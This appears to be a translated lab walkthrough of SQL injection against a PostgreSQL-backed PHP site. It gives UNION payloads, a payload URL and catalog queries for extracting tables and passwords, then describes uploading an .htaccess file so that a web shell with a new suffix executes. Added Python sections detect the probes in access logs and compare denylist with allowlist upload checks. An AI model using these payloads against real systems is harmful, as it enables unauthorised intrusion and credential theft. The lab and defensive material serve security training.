From SQL INJECTION TO SHELL: POSTGRESQL EDITION

Source: Internet
Author: User

First, a brief introduction to PostgreSQL. It is a database management system, the same type of software as Oracle, with a market share of about 8%.

(Figure: survey of open-source database use in the ITPUB community)

Test SQL Injection

This is a continuation of From SQL Injection to Shell. We recommend that you complete the previous level first.

It is basically similar to From SQL Injection to Shell, so the parts they have in common are not covered again.

The error message has changed this time.

Use SQL Injection

The attack methods are UNION and ORDER BY.

SELECT id, name, price FROM articles where id = 1 union select 1
SELECT id, name, price FROM articles where id = 1 union select 1, 2
SELECT id, name, price FROM articles where id = 1 union select 1, 2, 3

Errors are reported in all three cases, but the error is different in the third case: the message says that the data type does not match.

Next, try ORDER BY. It makes the number of fields easy to test. If the number of queried fields is exceeded, the following message is displayed:

 

Search information

The UNION in the previous step showed that the data type does not match, so the numbers are changed to null.

Union select 'aaa', null

No error is returned.

Let's try the following situations again:

Union select 'aaa', null
1 union select null, 'aaa', null, null
1 union select null, null, 'aaa', null
1 union select null, null, null, 'aaa'

No error is reported for the 2nd and 3rd statements, and the data type does not match. If you view the HTML of the webpage, you will find that 'aaa' exists in

We use the 2nd position to build statements that query version(), current_user and current_database().

Note that the functions here are slightly different from the previous ones. Previously they were version(), current_user(), current_database().

This is because the previous database was MySQL.

http://www.vulnerable.com/cat.php?id=1%20union%20select%20null,version%28%29,null,null

Next, we try to get the table names and fields of the current database. The method is similar to that for MySQL: PostgreSQL also has a meta-information database that we can query.

Query table name: SELECT tablename FROM pg_tables

Query all fields:

SELECT column_name FROM information_schema.columns

Applied to this instance:

Union select null, tablename, null, null FROM pg_tables
1 union select null, column_name, null, null FROM information_schema.columns

 

To obtain both the field and the corresponding table name:

Union select null, table_name, column_name, null, null FROM information_schema.columns
1 union select null, table_name || ':' || column_name, null, null FROM information_schema.columns

The concat function was used in the previous exercise, but it cannot be used with this database, so the || operator joins the two values instead.

Find the USERS table and its fields in the result.

Find the password and decrypt it.
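Every request in this walkthrough puts something other than an integer into the id parameter, so it stands out in the web server's access log. The following detection sketch is an added example, not part of the original article; the log lines are constructed and the combined log format is an assumption, while /cat.php and the id parameter come from the URL above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Most specific stage first; matched against the URL-decoded id value.
STAGES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("catalog enumeration", re.compile(r"\b(pg_tables|information_schema)\b", re.I)),
    ("fingerprinting", re.compile(r"\b(version\s*\(|current_user|current_database)", re.I)),
    ("union probe", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cat.php?id=1%20order%20by%205 HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cat.php?id=1%20union%20select%20null,version%28%29,null,null HTTP/1.1" 200 640',
    '203.0.113.7 - - [01/Jan/2024:10:00:14 +0000] "GET /cat.php?id=1%20union%20select%20null,tablename,null,null%20from%20pg_tables HTTP/1.1" 200 900',
    '203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /cat.php?id=2%27 HTTP/1.1" 500 120',
]


def classify_id(value):
    """Return None for a plain integer id, else a label for the probe stage."""
    if re.fullmatch(r"\d+", value):
        return None
    for label, pattern in STAGES:
        if pattern.search(value):
            return label
    return "non-integer id"


def scan(lines):
    """Return (line_number, stage, decoded_id) for suspicious cat.php requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.endswith("/cat.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            stage = classify_id(value)
            if stage:
                hits.append((n, stage, value))
    return hits


if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The same integer check, applied in the application before the query is built and combined with a parameterized query, removes the injection point rather than only detecting its use.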

Log in to the account and upload files

This is the difficult part of this article.

In the previous level I used .php3, and this time it is filtered out as well. After some testing, all PHP extensions turn out to be filtered.

This time we introduce the .htaccess file.

This file is very useful, and it is similar to the Windows autorun.inf. See Baidu Encyclopedia:

The .htaccess file (or "distributed configuration file") provides a way to change configuration per directory: a file containing one or more directives is placed in a particular document directory and applies to that directory and all its subdirectories. The directives available to a user are restricted. The administrator sets this through Apache's AllowOverride directive.

The content of the .htaccess file is as follows; it adds a suffix that the PHP module will execute. The suffix .blah is unlikely to be filtered out.

Note that ".htaccess" is not a suffix; it is the entire file name. It is difficult to give a file this name in the Windows graphical interface, so it must be renamed in DOS mode.

 

Rename shell.php3 to shell.blah and upload both files to the server. Something magical happens.
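The upload succeeds because the filter is a denylist of PHP suffixes, which knows nothing about .htaccess or a new suffix such as .blah. The following comparison of that denylist with an allowlist check is an added example, not code from the original article; the denylist pattern, the allowed image suffixes and the function names are assumptions for illustration.

```python
import os
import re
import secrets

# Denylist in the style the article describes: reject known PHP suffixes only.
PHP_SUFFIXES = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Allowlist for a hypothetical image upload; adjust to what the site needs.
ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}


def denylist_accepts(filename):
    """Weak check: anything that does not end in a PHP suffix is accepted."""
    return PHP_SUFFIXES.search(filename) is None


def allowlist_store_name(filename):
    """Return a server-chosen name for an acceptable upload, else None."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or base.startswith("."):
        return None  # path components, or dotfiles such as .htaccess
    stem, ext = os.path.splitext(base)
    if not stem or ext.lower() not in ALLOWED:
        return None
    # The client-supplied name never reaches the disk, only the suffix does.
    return secrets.token_hex(16) + ext.lower()


def compare(names):
    """Return (name, denylist verdict, allowlist verdict) for each name."""
    return [(n, denylist_accepts(n), allowlist_store_name(n) is not None) for n in names]


if __name__ == "__main__":
    # The three file names from the walkthrough plus one legitimate image.
    for row in compare([".htaccess", "shell.blah", "shell.php3", "photo.JPG"]):
        print(row)
```

On the Apache side, setting AllowOverride None for the upload directory means an uploaded .htaccess file is ignored even if one gets through.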

 
